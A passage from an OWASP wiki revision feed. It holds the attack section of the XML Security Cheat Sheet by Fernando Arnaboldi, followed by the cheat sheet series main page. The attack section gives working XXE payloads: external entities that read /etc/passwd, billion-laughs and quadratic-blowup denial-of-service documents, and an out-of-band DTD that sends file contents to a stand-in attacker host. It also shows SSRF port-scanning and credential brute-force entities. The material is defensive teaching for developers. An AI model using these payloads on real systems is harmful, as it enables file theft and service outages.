  public void characters(char[] ac, int i, int j) throws SAXException {&lt;br /&gt;
   String tmpValue = new String(ac, i, j);&lt;br /&gt;
   System.out.println(tmpValue);&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ java parseDocument&lt;br /&gt;
 John&lt;br /&gt;
 '''### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
&lt;br /&gt;
==== XXE using StAX ====&lt;br /&gt;
 import javax.xml.parsers.SAXParserFactory;&lt;br /&gt;
 import javax.xml.stream.XMLStreamReader;&lt;br /&gt;
 import javax.xml.stream.XMLInputFactory;&lt;br /&gt;
 import java.io.File;&lt;br /&gt;
 import java.io.FileReader;&lt;br /&gt;
 import java.io.FileInputStream;&lt;br /&gt;
&lt;br /&gt;
 public class parseDocument {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   try {&lt;br /&gt;
    XMLInputFactory xmlif = XMLInputFactory.newInstance();&lt;br /&gt;
    FileReader fr = new FileReader(&amp;quot;contacts.xml&amp;quot;);&lt;br /&gt;
    File file = new File(&amp;quot;contacts.xml&amp;quot;);&lt;br /&gt;
    XMLStreamReader xmlfer = xmlif.createXMLStreamReader(&amp;quot;contacts.xml&amp;quot;, new FileInputStream(file));&lt;br /&gt;
    int eventType = xmlfer.getEventType();&lt;br /&gt;
    while (xmlfer.hasNext()) {&lt;br /&gt;
     eventType = xmlfer.next(); &lt;br /&gt;
     if(xmlfer.hasText()){&lt;br /&gt;
      System.out.print(xmlfer.getText());&lt;br /&gt;
     }&lt;br /&gt;
    }&lt;br /&gt;
    fr.close();&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ java parseDocument&lt;br /&gt;
 &amp;lt;!DOCTYPE contacts SYSTEM &amp;quot;contacts.dtd&amp;quot;&amp;gt;'''John### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between elements:&lt;br /&gt;
 &amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;A&amp;gt;'''&amp;amp;A;'''&amp;lt;/A&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(a 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(a 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt; &lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;LOL9;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by parsing the 3*10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash. &lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message :&lt;br /&gt;
 &amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt; &lt;br /&gt;
 &amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;'''&amp;amp;LOL9;'''&amp;quot; XMLNS:SOAP=&amp;quot;&amp;lt;nowiki&amp;gt;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
   &amp;lt;KEYWORD XMLNS=&amp;quot;&amp;lt;nowiki&amp;gt;URN:PARASOFT:WS:STORE&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
 &amp;lt;/SOAP:ENVELOPE&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY '''xxe''' SYSTEM &amp;quot;'''/etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;xxe;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, which will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF ) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
'''External DNS Resolution'''&lt;br /&gt;
&lt;br /&gt;
Sometimes is possible to induce the application to perform server-side DNS lookups of arbitrary domain names. This is one of the simplest forms of SSRF, but requires the attacker to analyze the DNS traffic. Burp has a plugin that checks for this attack.&lt;br /&gt;
 &amp;lt;!DOCTYPE m PUBLIC &amp;quot;-//B/A/EN&amp;quot; &amp;quot;http://'''checkforthisspecificdomain'''.example.com&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY '''%xxe''' SYSTEM &amp;quot;'''&amp;lt;nowiki&amp;gt;http://attacker/evil.dtd&amp;lt;/nowiki&amp;gt;'''&amp;quot;&amp;gt; &lt;br /&gt;
  '''%xxe;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allows for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % '''file''' SYSTEM &amp;quot;'''file:///etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % '''dtd''' SYSTEM &amp;quot;'''&amp;lt;nowiki&amp;gt;http://attacker/evil.dtd&amp;lt;/nowiki&amp;gt;'''&amp;quot;&amp;gt;&lt;br /&gt;
  '''%dtd;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;send;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt; which loads a remote DTD. The remote DTD should contain something like this::&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY % '''all''' &amp;quot;&amp;lt;!ENTITY '''send''' SYSTEM '&amp;lt;nowiki/&amp;gt;'''&amp;lt;nowiki&amp;gt;http://example.com/?%file;'&amp;lt;/nowiki&amp;gt;'''''&amp;gt;&amp;quot;&amp;gt;''&lt;br /&gt;
 '''%all;'''&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL.&lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
The simplest and most unusual scenario, with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 java.io.IOException: Server returned HTTP response code: 401 for URL: &amp;lt;nowiki&amp;gt;http://192.168.1.1:80&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
  at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
  at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme (http, ftp, etc). For example the following :&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''user''' SYSTEM &amp;quot;http://'''username:password'''@example.com:8080&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;user;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
Fernando Arnaboldi - fernando.arnaboldi [at] ioactive.com&lt;br /&gt;
&lt;br /&gt;
= Other Cheatsheets =&lt;br /&gt;
&lt;br /&gt;
{{Cheatsheet_Navigation_Body}}&lt;br /&gt;
[[Category:Cheatsheets]]&lt;br /&gt;
[[Category:Popular]]&lt;br /&gt;
[[Category:OWASP_Breakers]]&lt;br /&gt;
{{TOC hidden}}&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Cheat_Sheet_Series&amp;diff=228674</id>
		<title>OWASP Cheat Sheet Series</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Cheat_Sheet_Series&amp;diff=228674"/>
				<updated>2017-04-14T14:55:06Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: /* News and Events */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Main = &lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:90px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File: lab_big.jpg|link=OWASP_Project_Stages#tab.3DLab_Projects]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:Cheatsheets-header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
The OWASP Cheat Sheet Series was created to provide a concise collection of high value information on specific web application security topics. These cheat sheets were created by various application security professionals who have expertise in specific topics. We hope that the OWASP Cheat Sheet Series provides you with excellent security guidance in an easy to read format.&lt;br /&gt;
&lt;br /&gt;
If you have any questions about the OWASP Cheat Sheet Series, please email the project leader [mailto:jim.manico@owasp.org Jim Manico] or subscribe to our [https://lists.owasp.org/mailman/listinfo/owasp-cheat-sheets project email list].&lt;br /&gt;
&lt;br /&gt;
== Authors ==&lt;br /&gt;
&lt;br /&gt;
Project Leader: [https://www.owasp.org/index.php/User:Jmanico Jim Manico] [mailto:jim.manico@owasp.org @]&amp;lt;br/&amp;gt;&lt;br /&gt;
Contributors: Mishra Dhiraj, Shruti Kulkarni, Torsten Gigler, Michael Coates, Jeff Williams, Dave Wichers, Kevin Wall, Jeffrey Walton, Eric Sheridan, Kevin Kenan, David Rook, Fred Donovan, Abraham Kang, Dave Ferguson, Shreeraj Shah, Raul Siles, Colin Watson, Neil Matatall and &amp;lt;b&amp;gt;many more&amp;lt;/b&amp;gt;!&lt;br /&gt;
&lt;br /&gt;
== OWASP Cheat Sheets ==&lt;br /&gt;
&lt;br /&gt;
{{Cheatsheet_Navigation_Body}}&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Access ==&lt;br /&gt;
OWASP Cheatsheet Series Book : April 2015 [https://www.owasp.org/images/9/9a/OWASP_Cheatsheets_Book.pdf PDF download].&lt;br /&gt;
&lt;br /&gt;
== Email List ==&lt;br /&gt;
[https://lists.owasp.org/mailman/listinfo/owasp-cheat-sheets Project Email List]&lt;br /&gt;
&lt;br /&gt;
== Licensing ==&lt;br /&gt;
The OWASP &amp;lt;i&amp;gt;Cheat Sheet Series&amp;lt;/i&amp;gt; is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
* [[OWASP Proactive Controls]]&lt;br /&gt;
* [https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project OWASP Application Security Verification Standard Project]&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* [Jan 17 2017] [https://www.owasp.org/index.php/XML_Security_Cheat_Sheet XML Security Cheat Sheet] added to project&lt;br /&gt;
* [Feb 6 2016] New navigation template rolled out project-wide&lt;br /&gt;
* [Jun 11 2015] [https://www.owasp.org/index.php/SAML_Security_Cheat_Sheet SAML Cheat Sheet] added to project&lt;br /&gt;
* [Feb 11 2015] [https://www.owasp.org/images/9/9a/OWASP_Cheatsheets_Book.pdf Cheat Sheet &amp;quot;book&amp;quot;] added to project &lt;br /&gt;
* [Apr 4 2014] All non-draft cheat sheets moved to new wiki template!&lt;br /&gt;
* [Feb 4 2014] Project-wide cleanup started&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-labs-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Labs_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_DOC.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Master Cheat Sheet =&lt;br /&gt;
&lt;br /&gt;
==Authentication==&lt;br /&gt;
Ensure all entities go through an appropriate and adequate form of authentication. All the application non-public resource must be protected and shouldn't be bypassed.&lt;br /&gt;
&lt;br /&gt;
For more information, check [https://www.owasp.org/index.php/Authentication_Cheat_Sheet Authentication Cheat Sheet]&lt;br /&gt;
&lt;br /&gt;
==Session Management==&lt;br /&gt;
&lt;br /&gt;
Use secure session management practices that ensure that authenticated users have a robust and cryptographically secure association with their session. &lt;br /&gt;
&lt;br /&gt;
For more information, check [https://www.owasp.org/index.php/Session_Management_Cheat_Sheet Session Management Cheat Sheet]&lt;br /&gt;
&lt;br /&gt;
==Access Control==&lt;br /&gt;
&lt;br /&gt;
Ensure that a user has access only to the resources they are entitled to. Perform access control checks on the server side on every request. All user-controlled parameters should be validated for entitlemens checks. Check if user name or role name is passed through the URL or through hidden variables. Prepare an ACL containing the Role-to-Function mapping and validate if the users are granted access as per the ACL.&lt;br /&gt;
&lt;br /&gt;
For more information, check [https://www.owasp.org/index.php/Access_Control_Cheat_Sheet Access Control Cheat Sheet]&lt;br /&gt;
&lt;br /&gt;
==Input Validation==&lt;br /&gt;
&lt;br /&gt;
Input validation is performed to minimize malformed data from entering the system. Input Validation is NOT the primary method of preventing XSS, SQL Injection. These are covered in output encoding below.&lt;br /&gt;
&lt;br /&gt;
For more information, check [https://www.owasp.org/index.php/Input_Validation_Cheat_Sheet Input Validation Cheat Sheet]&lt;br /&gt;
&lt;br /&gt;
==Output Encoding==&lt;br /&gt;
&lt;br /&gt;
Output encoding is the primary method of preventing XSS and injection attacks. Input validation helps minimize the introduction of malformed data, but it is a secondary control.&lt;br /&gt;
&lt;br /&gt;
For more information, check [https://www.owasp.org/index.php/XSS_Prevention_Cheat_Sheet XSS (Cross Site Scripting) Prevention Cheat Sheet].&lt;br /&gt;
&lt;br /&gt;
==Cross Domain==&lt;br /&gt;
&lt;br /&gt;
Ensure that adequate controls are present to prevent against Cross-site Request Forgery, Clickjacking and other 3rd Party Malicious scripts.&lt;br /&gt;
&lt;br /&gt;
For more information, check [https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet Cross Site Request Forgery]&lt;br /&gt;
&lt;br /&gt;
==Secure Transmission==&lt;br /&gt;
&lt;br /&gt;
Ensure that all the applications pages are served over cryptographically secure HTTPs protocols. Prohibit the transmission of session cookies over HTTP.&lt;br /&gt;
&lt;br /&gt;
For more information, check [https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet Transport Protection Cheat Sheet]&lt;br /&gt;
&lt;br /&gt;
==Logging==&lt;br /&gt;
&lt;br /&gt;
Ensure that all the security related events are logged. Events include: User log-in (success/fail); view; update; create, delete, file upload/download, attempt to access through URL, URL tampering. Audit logs should be immutable and write only and must be protected from unauthorized access.&lt;br /&gt;
&lt;br /&gt;
For more information, check [https://www.owasp.org/index.php/Logging_Cheat_Sheet Logging Cheat Sheet]&lt;br /&gt;
&lt;br /&gt;
==Uploads==&lt;br /&gt;
&lt;br /&gt;
Ensure that the size, type, contents and name of the uploaded files are validated. Uploaded files must not be accessible to users by direct browsing. Preferably store all the uploaded files in a different file server/drive on the server. All files must be virus scanned using a regularly updated scanner.&lt;br /&gt;
&lt;br /&gt;
= Roadmap =&lt;br /&gt;
&lt;br /&gt;
* Bring all cheat sheets out of draft by December 2016&lt;br /&gt;
* Go through the cheat sheets to make sure what they recommend is consistent with ASVS (TBD).&lt;br /&gt;
&lt;br /&gt;
